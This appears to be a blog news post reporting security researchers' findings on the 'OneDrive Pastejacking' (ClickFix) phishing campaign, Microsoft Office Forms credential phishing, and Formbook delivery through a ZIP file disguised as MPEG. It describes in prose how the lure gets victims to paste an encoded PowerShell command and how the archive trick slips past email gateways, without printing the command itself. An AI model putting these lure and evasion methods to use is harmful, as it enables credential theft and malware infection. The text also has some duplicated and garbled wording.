The cyber security company is tracking the "crafty" phishing and downloader campaign under the name OneDrive Pastejacking. The attack begins with an email which contains an HTML file that, when opened, displays an image simulating an OneDrive page and includes an error message that says: "Failed to connect to the 'OneDrive' cloud service. For fixing such, you are required to update the DNS cache manually.
The message has two options namely "How to fix" and "Details", where the latter direct the email recipient to a legitimate Microsoft Learn page on Troubleshooting DNS. As soon as you click "How to fix", it prompts the user to follow a series of steps, which includes pressing "Windows Key + X" to open the Quick Link menu. This in turn, help to launch the PowerShell terminal, and pasting a Base64 encoded command to supposedly fix the issue.
The command [...] first runs ipconfig/flushdns, then creates a folder on the C: drive named 'downloads'. Thereafter, it downloads an archive file into this location, renames it, extracts its contents ('script.a3x' and 'AutoIt3.exe'), and executes script.a3x using AutoIt3.exe.
The campaign has been observed to target users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.
The disclosure builds upon same findings from ReliaQuest, Proofpoint, and McAfee Labs, which indicates that phishing attacks employing this technique and also tracked as ClickFix, which are becoming prevalent at an increasing rate.
The progress comes along with the discovery of a new email-based social engineering campaign that is distributing bogus Windows shortcut files, leading to execution of malicious payloads hosted on Discord's Content Delivery Network (CDN) infrastructure.
The phishing campaigns have increasingly observed to send emails containing links to Microsoft Office Forms from previously compromised legitimate email accounts to entice targets into disclosing their credentials under the pretext of restoring their Outlook messages.
The threat actors create legitimate-looking forms on Microsoft Office Forms, that embeds malicious links within the forms. These forms are then sent to targets en-masse through email under the guise of legitimate requests such as changing passwords or accessing important documents, along with mimicking trusted platforms and brands like Adobe or Microsoft SharePoint document viewer.
However, other attack waves have utilized invoice-themed lures to trick the victims to share their credentials on phishing pages hosted on Cloudflare R2 that are then exfiltrated to the threat actor through a Telegram bot.
It is not at all surprising that adversaries are constantly on the lookout for different ways to stealthily smuggle malware post Secure Email Gateways (SEGs) so as to increase the likelihood of success of their attacks.
As per recent report from Cofense, bad actors are abusing how SEGs scan ZIP archive attachments to deliver the Formbook information stealer by means of DBatLoader. This involves passing off the HTML payload as an MPEG file to evade detection by taking advantage of the fact that many common archive extractors and SEGs parse the file header information but ignore the file header information but ignore the file footer that may contain more accurate information about the file format.
The attackers utilized a .ZIP archive attachment and when the SEG scanned the file contents, the archive was detected as containing a .MPEG video file and was not blocked or filtered. When this attachment was opened with common/popular archive extraction tools such as 7-Zip or Power ISO, which seems to contain a .MPEG video file, but it would not play. However, when the archive was opened in an Outlook client or through the Windows Explorer archive manager, the .MEPG file is detected as being a .HTML file.
.png)
Comments
Post a Comment